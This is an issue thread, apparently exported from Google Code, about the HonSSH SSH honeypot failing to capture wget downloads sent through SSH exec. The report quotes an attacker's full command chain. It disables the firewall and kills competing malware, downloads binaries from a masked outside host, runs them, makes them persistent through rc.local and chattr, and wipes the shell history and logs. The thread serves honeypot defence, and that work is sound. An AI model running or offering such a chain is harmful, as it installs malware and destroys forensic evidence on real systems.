HonSSH ignores wget inside EXEC commands

[GoogleCodeExporter]

What steps will reproduce the problem?
1. The attacker has found the login to the honeypot

2. The attacker executes a series of commands while logging in (i've seen more 
and more of this behavior lately), some of which includes a wget command(s), 
the files are not caught by HonSSH.

Example:

ssh -l root blacks.trollpot.biteme /etc/init.d/iptables stop\necho "nameserver 
8.8.8.8" >> /etc/resolv.conf\necho "nameserver 8.8.4.4" >> 
/etc/resolv.conf\nyum -y install wget\nchmod 7777 / etc\nkillall -9 
.IptabLes\nkillall -9 nfsd4\nkillall -9 profild.key\ncd /etc;rm -rf dir 
fake.cfg\nkillall -9 nfsd\nkillall -9 DDosl\nkillall -9 lengchao32\nkillall -9 
b26\nkillall -9 Bill\nkillall -9 n26\nkillall -9 1\nkillall -9 
codelove\nkillall -9 32\nkillall -9 m32\nkillall -9 m64\nkillall -9 64\nkillall 
-9 83BOT \nkillall -9 82BOT\nkillall -9 dos64\nkillall -9 dos32\nkillall -9 
new6\nkillall -9 new4\nkillall -9 node24\nkillall -9 mimi\nkillall -9 
nodeJR-1\nkillall -9 freeBSD\nkillall -9 ksapdd\nkillall -9 kysapdd\nkillall -9 
sksapdd\nkillall -9 xsw \nkillall -9 syslogd\nkillall -9 skysapdd\nkillall -9 
cupsddd\nkillall -9 ksapd\nkillall -9 atddd\nkillall -9 xfsdxd\ncd /root; chmod 
7777 / etc\nkillall -9 minerd\nkillall -9 0\nkillall -9 joudckfr\nkillall -9 
www\nkillall -9 log\nkillall -9 .IptabLex\nkillall -9 .Mm2\nkillall -9 
acpid\nkillall -9 m64 \nkillall -9 ./QQ\nkillall -9 QQ\nkillall -9 g3\nkillall 
-9 2\nkillall -9 3\nkillall -9 pm\nkillall -9 qweasd\nkillall -9 
tangtang\nkillall -9 imap-login\nkillall -9 cupsdd\nkillall -9 xudp\nkillall -9 
txma\nkillall -9 mrdos64.b00\nkillall -9 mrdos32.b00\nkillall -9 
kkpklp\nkillall -9 kiilp\nkillall -9 xin1\nkillall -9 jibateng\ncd /root;rm -rf 
dir nohup.out\ncd /etc;rm -rf dir cupsddd\ncd /etc;rm -rf dir atddd\ncd /etc;rm 
-rf dir ksapdd\ncd /etc;rm -rf dir kysapdd\ncd /etc;rm -rf dir sksapdd\ncd 
/etc;rm -rf dir skysapdd\ncd /etc;rm -rf dir xfsdxd\ncd /etc;rm -rf dir 
fake.cfg\ncd /etc;rm -rf dir cupsdd\ncd /etc;rm -rf dir cupsdd.*\ncd /etc;rm 
-rf dir cupsddd.*\ncd /etc;rm -rf dir atddd.*\ncd /etc;rm -rf dir ksapdd.*\ncd 
/etc;rm -rf dir kysapdd.*\ncd /etc;rm -rf dir sksapdd.*\ncd /etc;rm -rf dir 
skysapdd.*\ncd /etc;rm -rf dir xfsdxd.*\ncd /etc;rm -rf dir cupsdd\ncd /etc;rm 
-rf dir atdd\ncd /etc;rm -rf dir ksapd\ncd /etc;rm -rf dir kysapd\ncd /etc;rm 
-rf dir sksapd\ncd /etc;rm -rf dir skysapd\ncd /etc;rm -rf dir xfsdx\ncd 
/etc;rm -rf dir fake.cfg\ncd /etc;rm -rf dir cupsdd.*\ncd /etc;rm -rf dir 
atdd.*\ncd /etc;rm -rf dir ksapd.*\ncd /etc;rm -rf dir kysapd.*\ncd /etc;rm -rf 
dir sksapd.*\ncd /etc;rm -rf dir skysapd.*\ncd /etc;rm -rf dir xfsdx.*\ncd 
/var/spool/cron; rm -rf dir root.*\ncd /var/spool/cron; rm -rf dir root\ncd 
/var/spool/cron/crontabs; rm -rf dir root.*\ncd /var/spool/cron/crontabs; rm 
-rf dir root\ncd /var/spool/cron ;wget http://sketchy.ip.address/root\ncd 
/var/spool/cron/crontabs ;wget http://sketchy.ip.address/root\ncd /etc;wget 
http://sketchy.ip.address/cupsdd\ncd /etc;wget 
http://sketchy.ip.address/ksapdd\ncd /etc;wget 
http://sketchy.ip.address/kysapdd\ncd /etc;wget 
http://sketchy.ip.address/atddd\ncd /etc;wget 
http://sketchy.ip.address/skysapdd\ncd /etc;wget 
http://sketchy.ip.address/sksapdd\ncd /etc;wget 
http://sketchy.ip.address/xfsdxd\ncd /etc;chmod 7777 xfsdxd\ncd /etc;chmod 7777 
atddd\ncd /etc;chmod 7777 cupsdd\ncd /etc;chmod 7777 ksapdd\ncd /etc;chmod 7777 
kysapdd\ncd /etc;chmod 7777 skysapdd\ncd /etc;chmod 7777 sksapdd\nnohup 
/etc/xfsdxd > /dev/null 2>&1&\nnohup /etc/cupsdd > /dev/null 2>&1&\nnohup 
/etc/ksapdd > /dev/null 2>&1&\nnohup /etc/kysapdd > /dev/null 2>&1&\nnohup 
/etc/atddd > /dev/null 2>&1&\nnohup /etc/skysapdd > /dev/null 2>&1&\nnohup 
/etc/sksapdd > /dev/null 2>&1&\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho 
"cd /etc;./kysapdd" >> /etc/rc.local \necho "cd /etc;./atddd" >> /etc/rc.local 
\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho "cd /etc;./skysapdd" >> 
/etc/rc.local \necho "cd /etc;./xfsdxd" >> /etc/rc.local \necho "unset 
MAILCHECK" >> /etc/profile\ncd /etc;chattr +i cupsdd\ncd /etc;chattr +i 
cupsdd\ncd /etc;chattr +i cupsdd\ncd /etc;chattr +i cupsdd\ncd /etc;chattr +i 
cupsdd\nrm -rf /root/.bash_history\ntouch /root/.bash_history\nhistory -r\ncd 
/var/log > dmesg \ncd /var/log > auth.log \ncd /var/log > alternatives.log \ncd 
/var/log > boot.log \ncd /var/log > btmp \ncd /var/log > cron \ncd /var/log > 
cups \ncd /var/log > daemon.log \ncd /var/log > dpkg.log \ncd /var/log > 
faillog \ncd /var/log > kern.log \ncd /var/log > lastlog\ncd /var/log > maillog 
\ncd /var/log > user.log \ncd /var/log > Xorg.x.log \ncd /var/log > 
anaconda.log \ncd /var/log > yum.log \ncd /var/log > secure\ncd /var/log > 
wtmp\ncd /var/log > utmp \ncd /var/log > messages\ncd /var/log > spooler\ncd 
/var/log > sudolog\ncd /var/log > aculog\ncd /var/log > access-log\ncd /root > 
.bash_history\nhistory -c\necho

What is the expected output?
There are a number of files being downloaded here 
(http://sketchy.ip.address/[filename])
that i would expect to be downloaded by HonSSH.

What do you see instead?
Only what is shown above.

What version of the product are you using? On what operating system?
b9880b4e367b

Please provide any additional information below.
Not sure if this is caused by running the commands at login, that there are 
multiple wget commands
or something else.

Original issue reported on code.google.com by are.hans...@gmail.com on 10 Mar 2014 at 10:29

[GoogleCodeExporter]

Thanks man :D

Original comment by tnn...@googlemail.com on 11 Mar 2014 at 6:05

• Changed state: Accepted

[GoogleCodeExporter]

Original comment by tnn...@googlemail.com on 16 Mar 2014 at 4:55

• Changed state: Started

[GoogleCodeExporter]

Should be fixed. Multiple wget commands will be recognized and pulled down, 
both in normal and EXEC usage.

Also added support for user and password wget flags :)

Original comment by tnn...@googlemail.com on 16 Mar 2014 at 5:51

• Changed state: Fixed